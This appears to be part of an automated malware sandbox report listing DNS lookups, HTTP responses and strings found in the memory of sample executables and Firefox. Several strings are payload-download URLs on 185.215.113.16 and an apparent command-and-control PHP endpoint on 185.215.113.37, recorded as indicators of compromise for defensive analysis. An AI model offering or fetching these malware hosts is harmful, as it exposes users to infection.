Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 16:08:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlU80XxykVYXECvBNVn09ItjFQrnzU8iKuNtTYuET0C6bWQ1QFZ9lgPVtbWfEgy2qrnwv%2BAuvjWg10xT1LfJ0Q6xDD9D9%2BYBWah6DcfpbkaQ4%2FZ9JLDgn9lbJ1loFt1WXRXYzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7b39269ac7e7c7-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 16:09:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZqWZHzPoRHt5jTPR%2FLd5ph90vo5RgBXdXLba3UG9HB%2BwiAitOuyZIByDVOlpMgdPMEgji4xKBH29hWXBAaZ0%2Be2tXsM3pdjxPcbv8N05AwuoQA7OlmMnyz%2B5z34SemQ2j0Nkgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7b3b5319784782-DFW
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 24 Oct 2024 16:09:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PVgP%2FpJAkODjj9ZyKIQSqCe5320uD7IlWdEv2xxHsrZNnJf2UDxpE%2BCqyFFPWjBuCc30clNcIiUXYAgdnzQpYe6wunxdRknx9ao0GjhFcbrtSHaKKXGIdzd5vzRQ9%2FdCTqJiNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7b3b8b5a2153c6-ATL
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084576000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3277613041.0000017081144000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3280899223.0000017081FC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.000001708525B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084D53000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3255924567.000001E2F2600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:27060
Source: 26e226f915.exe, 0000000D.00000003.3294085601.0000000001692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3294085601.0000000001692000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/gw
Source: 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 26e226f915.exe, 0000000D.00000003.3292795200.000000000162B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeU
Source: 26e226f915.exe, 0000000D.00000003.3288342561.0000000005DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exed
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exer
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeX
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000162B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe0
Source: 26e226f915.exe, 0000000D.00000003.3288904096.000000000168C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeOe
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/O(
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000001044000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpV
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015E3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000001044000.00000004.00000020.00020000.00000000.sdmp, ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php_
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.00000000015F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpindows
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.000000000105B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpj
Source: ef2532c0b1.exe, 0000000C.00000002.3014293851.000000000159E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37Family
Source: 9NWW1UIUAOJA8NFOZHWEDA.exe, 00000004.00000002.2416316812.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37rpn
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.0000017084499000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2182444085.0000000005776000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3092399060.0000000005E37000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3201383753.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001B.00000002.3298702178.0000017083BCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296944839.00000170839BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.0000017083117000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084FA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001B.00000002.3298702178.0000017083BCA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3303238080.0000017084239000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3312875221.0000017084DF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3280899223.0000017081FC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3255924567.000001E2F2600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#Not
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#Instance
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#The
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3168936561.00000170855CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3332238154.00000170855CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3178632048.00000170855CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3206581010.00000170855CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdhttp://mozilla.org/#/propert
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slughttp://mozilla.org/#/propertie
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/itemsextensions.webcompat.disabled_shims.Crave.ca
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1http://mozilla.org/#/properties/targeting
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/featureshttp://mozilla.org/#/prope
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratioJSON.parse:
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/itemsurlclassifier.features.socialtracking.blacklis
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/brancheshttp://mozilla.org/#/properties/branches/anyOf/1http://mozil
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/countextensions.webcompat.disabled_shims.Kin
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnitArray
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/startextensions.webcompat.disabled_shims.Web
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
